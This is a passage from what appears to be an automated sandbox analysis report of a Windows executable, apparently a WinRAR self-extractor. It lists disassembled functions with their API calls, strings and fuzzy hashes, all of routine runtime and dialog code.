                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1324828854-0
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 0041B0EF
                                                                                      • _swprintf.LIBCMT ref: 0041B123
                                                                                        • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
                                                                                      • SetDlgItemTextW.USER32(?,00000066,00443122), ref: 0041B143
                                                                                      • _wcschr.LIBVCRUNTIME ref: 0041B176
                                                                                      • EndDialog.USER32(?,00000001), ref: 0041B257
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                      • String ID: %s%s%u
                                                                                      • API String ID: 2892007947-1360425832
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                      • String ID: %08x
                                                                                      • API String ID: 1593746830-3682738293
                                                                                      APIs
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004185B5
                                                                                      • GetWindowRect.USER32(?,?), ref: 004185DA
                                                                                      • ShowWindow.USER32(?,00000005,?), ref: 00418671
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00418679
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 0041868F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$RectText
                                                                                      • String ID: RarHtmlClassName
                                                                                      • API String ID: 3937224194-1658105358
                                                                                      • Opcode ID: 31c15fb96e7a5b38f9dece7491b379e91fc524e0c88f33f425ca3179d6983491
                                                                                      • Instruction ID: b9dbe71992cf54109f0a2f08805896309cf4031f1c28e39b89479440570d00e5
                                                                                      • Opcode Fuzzy Hash: 31c15fb96e7a5b38f9dece7491b379e91fc524e0c88f33f425ca3179d6983491
                                                                                      • Instruction Fuzzy Hash: 2531C132540304AFCB109F649D4CF5BBBA8FF48701F04442AFE499A292DB74E810CBAA
                                                                                      APIs
                                                                                        • Part of subcall function 004292D3: _free.LIBCMT ref: 004292FC
                                                                                      • _free.LIBCMT ref: 0042935D
                                                                                        • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
                                                                                        • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
                                                                                      • _free.LIBCMT ref: 00429368
                                                                                      • _free.LIBCMT ref: 00429373
                                                                                      • _free.LIBCMT ref: 004293C7
                                                                                      • _free.LIBCMT ref: 004293D2
                                                                                      • _free.LIBCMT ref: 004293DD
                                                                                      • _free.LIBCMT ref: 004293E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                      • Instruction ID: 329fbb860909e2112fafce03e7f7f98c322d102f6737cd64bb203afe2e51e2b1
                                                                                      • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                      • Instruction Fuzzy Hash: 3C115EB1B41B24F6D920BB72ED07FCB77AC5F04708FC44C1AB299E6092DA78B9444664
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00420C0B,0041E662), ref: 00420C22
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00420C30
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00420C49
                                                                                      • SetLastError.KERNEL32(00000000,?,00420C0B,0041E662), ref: 00420C9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: b842a87227fb7387e7a5ceea4eeeada40c6d45f11a6d0edb67ea972190fb7fa6
                                                                                      • Instruction ID: 8b9ecc5f6ed396bb8fb9180011c444437e6625ddb262a5cc42c9d5bde12d0b84
                                                                                      • Opcode Fuzzy Hash: b842a87227fb7387e7a5ceea4eeeada40c6d45f11a6d0edb67ea972190fb7fa6
                                                                                      • Instruction Fuzzy Hash: A801D4B23893355EAB292AB67C859272A98EB117B9BB0033FF520501F2EE294C11518D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                      • API String ID: 0-1718035505
                                                                                      • Opcode ID: ff2253f3daf32d4d3de00c01ce552598c65b0d0e0cb496f525ffa21868918c9a
                                                                                      • Instruction ID: 20d3aaa082a4ed3a9640bd11e3999cf40b280264533ef8538f4cac0fcdb3d047
                                                                                      • Opcode Fuzzy Hash: ff2253f3daf32d4d3de00c01ce552598c65b0d0e0cb496f525ffa21868918c9a
                                                                                      • Instruction Fuzzy Hash: F001D1B2AC13325B4F203EB56CD46E727949A067973202A3BE810D3350E718C8C5E6ED
                                                                                      APIs
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 004100AE
                                                                                        • Part of subcall function 0040A8E0: GetVersionExW.KERNEL32(?), ref: 0040A905
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004100D0
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 004100EA
                                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004100FB
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041010B
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00410117
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2092733347-0
                                                                                      • Opcode ID: 6b2897f1808b1d0a7cc052cee766c89f4fe322d3d0f8d389d52ac723ee4b9e97
                                                                                      • Instruction ID: 0b4916178763dc66620a194639bfef4680fe520ebf1d1e987176b8f9a8a90618
                                                                                      • Opcode Fuzzy Hash: 6b2897f1808b1d0a7cc052cee766c89f4fe322d3d0f8d389d52ac723ee4b9e97
                                                                                      • Instruction Fuzzy Hash: 0931F47A1083459BC704DFA5D9809ABB7F8FF98704F04492EF999C3210E734E549CB2A
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: 5d4a9c7590df4a7a3f066a26f0cbd8db67f99bc0d1f2f6b85be5233878dda6a5
                                                                                      • Instruction ID: 6ff5062d3f8463062aaa34de807ed55c5573daeccb318b40f3d77ae47cbf6415
                                                                                      • Opcode Fuzzy Hash: 5d4a9c7590df4a7a3f066a26f0cbd8db67f99bc0d1f2f6b85be5233878dda6a5
                                                                                      • Instruction Fuzzy Hash: E82128B560050AABD7055A11CC81FFB77ACAF54758F14426FFC088A202F77CDDC14699
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0040FB07
                                                                                      • EnterCriticalSection.KERNEL32(00441E74,00000000,?,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF,?), ref: 0040FB15
                                                                                      • new.LIBCMT ref: 0040FB35
                                                                                      • new.LIBCMT ref: 0040FB6B
                                                                                      • LeaveCriticalSection.KERNEL32(00441E74,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF,?,00008000,?), ref: 0040FB8B
                                                                                      • LeaveCriticalSection.KERNEL32(00441E74,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF,?,00008000,?), ref: 0040FB96
                                                                                        • Part of subcall function 0040F930: InitializeCriticalSection.KERNEL32(000001A0,00441E74,00000000,?,?,0040FB88,00000020,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?), ref: 0040F969
                                                                                        • Part of subcall function 0040F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF), ref: 0040F973
                                                                                        • Part of subcall function 0040F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF), ref: 0040F983
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                      • String ID:
                                                                                      • API String ID: 3919453512-0
                                                                                      • Opcode ID: c56474174169346508d1e9649acf93e9edf1adbe36175df3016f18d90880808a
                                                                                      • Instruction ID: 086c70df32f7b29fe9b58630c0a4ed6e262e1e33b7e3bbb7ea3b2846072d0a1f
                                                                                      • Opcode Fuzzy Hash: c56474174169346508d1e9649acf93e9edf1adbe36175df3016f18d90880808a
                                                                                      • Instruction Fuzzy Hash: 04110A38A012119BD7149B69EC55BBE76B4EB45B14F10013FF805E77E0DB789845CB5C
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,0043CBE8,00422674,0043CBE8,?,?,00422213,?,?,0043CBE8), ref: 00426323
                                                                                      • _free.LIBCMT ref: 00426356
                                                                                      • _free.LIBCMT ref: 0042637E
                                                                                      • SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 0042638B
                                                                                      • SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 00426397
                                                                                      • _abort.LIBCMT ref: 0042639D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: 0ada623a70582730fa45054c4f99239dbb3d3feb01f4581ffd10e15609ac9e28
                                                                                      • Instruction ID: a402012bd372f4e1ca1b3782ddb9aef1c81e3407300f5af7adfef0e7a5348c00
                                                                                      • Opcode Fuzzy Hash: 0ada623a70582730fa45054c4f99239dbb3d3feb01f4581ffd10e15609ac9e28
                                                                                      • Instruction Fuzzy Hash: ECF02D72745B3026C711BB367C4AB1B12298FC1776FB6022BFD1492291EF3DC801415D
                                                                                      APIs
                                                                                      • CharUpperW.USER32(?,?,?,?,00001000), ref: 0041A92C
                                                                                      • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0041A953
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharUpper
                                                                                      • String ID: *aD$-
                                                                                      • API String ID: 9403516-225298449
                                                                                      • Opcode ID: 9f0408d775167781d3d73a3ec1760e6e55585ec9efd2bb7af3c94a516ffc8efc
                                                                                      • Instruction ID: 1162f33b1152275b3f40cae274754ede0a1f280d6a101c0d24c3e91e12c730ce
                                                                                      • Opcode Fuzzy Hash: 9f0408d775167781d3d73a3ec1760e6e55585ec9efd2bb7af3c94a516ffc8efc
                                                                                      • Instruction Fuzzy Hash: D921F8B141530655D321EB69880CBFBA698E785314F024C2BF584D6A85E67CD8F8D36F
APIs
  • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
  • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
• EndDialog.USER32(?,00000001), ref: 0041B86B
• GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0041B881
• SetDlgItemTextW.USER32(?,00000065,?), ref: 0041B89B
• SetDlgItemTextW.USER32(?,00000066), ref: 0041B8A6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ItemText$DialogWindow
• String ID: RENAMEDLG
• API String ID: 445417207-3299779563
• Opcode ID: e56df44a3f49d28b651060f885f9c86b3dc55448e2b8712b3a1f357db754fba5
• Instruction ID: ebf52a1fa832525207de4e5a5c53ff233284eb086c51926fb5b4fa25e5bf0789
• Opcode Fuzzy Hash: e56df44a3f49d28b651060f885f9c86b3dc55448e2b8712b3a1f357db754fba5
• Instruction Fuzzy Hash: BE0145739803157AE111AAA59E48FB77B6CDF85F41F00082BF244B21A0C76AA80196BF
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00424A90,?,?,00424A30,?,00437F68,0000000C,00424B87,?,00000002), ref: 00424AFF
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00424B12
• FreeLibrary.KERNEL32(00000000,?,?,?,00424A90,?,?,00424A30,?,00437F68,0000000C,00424B87,?,00000002,00000000), ref: 00424B35
Strings
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 8d825f1051fcf2ae9bdfa6911753ad92d9f90427013952ed253254a7873343c1
• Instruction ID: 8fa197d7e83727dc8b81b9f1c09d242209dcca5feb3adf6075c6ba9f23e09af0
• Opcode Fuzzy Hash: 8d825f1051fcf2ae9bdfa6911753ad92d9f90427013952ed253254a7873343c1
• Instruction Fuzzy Hash: DBF06830A40118BFCB159FA5EC59B9EBFB5EF48711F500175F805A2250DF799D44CB98
APIs
  • Part of subcall function 0040F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0040F324
  • Part of subcall function 0040F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0040DEC8,Crypt32.dll,?,0040DF4A,?,0040DF2E,?,?,?,?), ref: 0040F346
• GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040DED4
• GetProcAddress.KERNEL32(00441E58,CryptUnprotectMemory), ref: 0040DEE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AddressProc$DirectoryLibraryLoadSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
• API String ID: 2141747552-1753850145
• Opcode ID: fe549e453d53044cb3f82184b8cbf9cbbfe0116ebab60e2271aadd83a969f2a2
• Instruction ID: a3cb50885851f18478d831be0a6e29e98c0c5a37f9eb91f2b4ebda6b8b46e81d
• Opcode Fuzzy Hash: fe549e453d53044cb3f82184b8cbf9cbbfe0116ebab60e2271aadd83a969f2a2
• Instruction Fuzzy Hash: 64E04FB0900B43AFDB505B75E859B06FBA47B64710F209637F014D2685DBB8D0A88B58
APIs
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 2edb4a8e1b0fb35445fe93dbd72e18b5244141851d1ac2ea075b62d5dc218b29
• Instruction ID: 55d85bc308e435c11cce4c785e552d3236625a443a0e00442266915be90aebcd
• Opcode Fuzzy Hash: 2edb4a8e1b0fb35445fe93dbd72e18b5244141851d1ac2ea075b62d5dc218b29
• Instruction Fuzzy Hash: 2041EE72B006209FCB14DF78D880A5EB7F1EF88314F5545AAE905EB381DA75AD01CB88
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 004289B8
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004289DB
  • Part of subcall function 004259FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00428A01
• _free.LIBCMT ref: 00428A14
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00428A23
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 7d5bdd618d7d46a2c65951a360a3c25941becdab276aa3dfa7c2a758fa181c4a
• Instruction ID: 5ee969388b481e443b28253e967ccc3161889c644780e2990321ba9501c60b45
• Opcode Fuzzy Hash: 7d5bdd618d7d46a2c65951a360a3c25941becdab276aa3dfa7c2a758fa181c4a
• Instruction Fuzzy Hash: AC0171B27026257B272156AA7C4CC7F6A6DDAC6FA1354022FB904D3205EE698C0291B9
APIs
• GetLastError.KERNEL32(?,?,?,00425E43,00425ADF,?,0042634D,00000001,00000364,?,00422213,?,?,0043CBE8), ref: 004263A8
• _free.LIBCMT ref: 004263DD
• _free.LIBCMT ref: 00426404
• SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 00426411
• SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 0042641A
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
